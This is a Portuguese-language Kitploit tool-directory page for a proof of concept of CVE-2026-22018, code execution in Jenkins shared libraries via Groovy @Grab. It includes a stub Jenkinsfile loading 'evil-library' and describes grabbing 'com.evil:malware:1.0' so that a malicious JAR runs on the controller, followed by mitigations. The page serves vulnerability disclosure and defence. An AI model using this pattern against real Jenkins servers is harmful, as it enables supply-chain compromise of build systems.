Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab- — PoC para CVE-2026-22018, um RCE crítico na Jenkins Pipeline Shared Library via Groovy @Grab, demonstrando injeção de código na cadeia de suprimentos e etapas de mitigação. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebDevSecOpsSegurança da Cadeia de Suprimentos
GitHubgeorge0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-

CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab-

PoC para CVE-2026-22018, um RCE crítico na Jenkins Pipeline Shared Library via Groovy @Grab, demonstrando injeção de código na cadeia de suprimentos e etapas de mitigação.

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-22018 – Execução de Código em Shared Library do Pipeline Jenkins via @Grab

Código do Programa (pipeline Groovy)

root@kitploit:~
// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
    evilStep()
}

CVE-2026-22018 – Execução Remota de Código em Shared Library do Pipeline Jenkins

Severity: Critical

Visão Geral

Um pipeline Jenkins carrega uma shared library de uma fonte não totalmente confiável. A shared library usa a anotação @Grab para baixar artefatos Maven externos, que podem incluir uma classe maliciosa que executa código no controlador Jenkins durante a compilação do Groovy.

Detalhes da Vulnerabilidade

  • Tipo: Injeção de Código / Supply Chain
  • Impacto: Comprometimento total do controlador Jenkins.
  • Causa Raiz: a anotação @Grab do Groovy busca e carrega JARs arbitrários em tempo de execução; shared libraries não são isoladas em sandbox.

Demonstração do Exploit

Configure um pipeline com uma shared library não confiável que contenha @Grab('com.evil:malware:1.0') em seu vars/evilStep.groovy. Quando o pipeline é executado, o inicializador estático do JAR malicioso é executado.

Mitigação

  • Use somente shared libraries de repositórios SCM confiáveis e assinados.
  • Desabilite @Grab por meio das configurações de segurança do sandbox Groovy.
  • Use a opção de pipeline “Load implicitly” com cuidado.

Instalação e Uso

root@kitploit:~
git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.
Baixar ferramenta